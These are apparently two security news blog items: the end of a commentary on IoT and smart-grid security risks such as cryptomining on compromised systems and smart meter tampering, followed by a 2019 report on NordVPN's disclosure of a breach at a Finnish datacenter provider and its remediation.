We can also imagine more subtle attacks than total electricity outages. There have been at least two major cases of illicit cryptocurrency-mining software on compromised nuclear power plant control systems. Cryptocurrency mining is incredibly power-intensive, and therefore has a high environmental impact – in addition to the cost and the potential to cause power distribution problems as described above. It’s not just companies that are affected by such attacks. In many (most?) cases, IoT devices are not well secured, and their vulnerabilities can lead to an attack where there is little user-initiated mitigation possible. Last year a large-scale operation was discovered using home internet routers to mine cryptocurrency. Where there is money to be made, and easily – given the vulnerability of the systems – there will be criminal exploitation.

Smart meters are a boon to utility companies as well as consumers and businesses, allowing precise monitoring of utility consumption, but their compromise can enable the theft of power/gas/water. Perhaps worse – such meters can also indicate how much generated power is being put into the grid (think rooftop solar) and the rest of the grid depends on that being accurate to do proper load balancing and generation. As is often the case with failures of security, it’s the unforeseen events that can have the most devastating results.

The European Union (EU) has been very active in implementing smart city technologies, among other IoT-driven projects, with many set up under the aegis of its research and innovation program, Horizon 2020. These projects vary in scope, but many have vast implications for the sectors they affect – smart cities and society, agriculture, healthcare, ocean and water management, food, manufacturing, and many other aspects of our lives.

Some of these projects are governed by Mission Boards that guide and advise on their implementation. (Full disclosure: I was one of 550 applicants to the Mission Board for Climate-Neutral and Smart Cities, but did not obtain one of its 15 seats.)

The boards are made up of members working in a diverse range of disciplines, and we should hope that cybersecurity will be foremost in their thoughts, although it is scarcely mentioned in the briefs for the boards.

When all is said and done, there will be tremendous benefits in implementing technologies that can improve lives and reduce environmental impact. On the other hand, we should never forget the risks that come with failing to consider the security of those technologies.

23 Oct 2019 – 11:30AM

NordVPN reveals breach at datacenter provider

The company says that the incident, going back to March 2018, affected only 1 out of its 3,000 servers

The well-known virtual private network (VPN) provider NordVPN admitted to a breach on Tuesday that had occurred at one of the facilities from which the company rents its servers.

The bad actors exploited an insecure remote management system left in place by the unnamed Finland-based datacenter provider – a system NordVPN says it wasn’t even aware was in use. The incident goes back to March 2018, and NordVPN said it learned about it “a few months ago”. The company also gave assurances that the server in question did not contain any user activity logs and that no user credentials were intercepted.

Nevertheless, the incident compromised a now-expired TLS key. NordVPN claims that there is no conceivable way the key could have been used to decrypt VPN traffic on other servers operated by the company, and it further attempted to allay the concerns:

“On the same note, the only possible way to abuse website traffic was by performing a personalized and complicated MitM [man-in-the-middle] attack to intercept a single connection that tried to access nordvpn.com,” said the company.

NordVPN also says that, immediately after the incident was discovered, it conducted a thorough audit of its entire infrastructure to check for any other weak points that could be exploited. The contract with the Finnish datacenter was terminated. The stated reason for the late disclosure of the breach is that the infrastructure audit, according to the company, took a long time due to the sheer number of servers maintained by the service.

NordVPN said it took steps to fix the problem by speeding up the encryption of its servers and creating a process for moving all of its servers to RAM, which is expected to be completed some time next year. Additional security measures are also being put in place: another audit is being conducted, a bug bounty program is being prepared, and data centers will have to meet stricter requirements for cooperation, said the company.

22 Oct 2019 – 04:16PM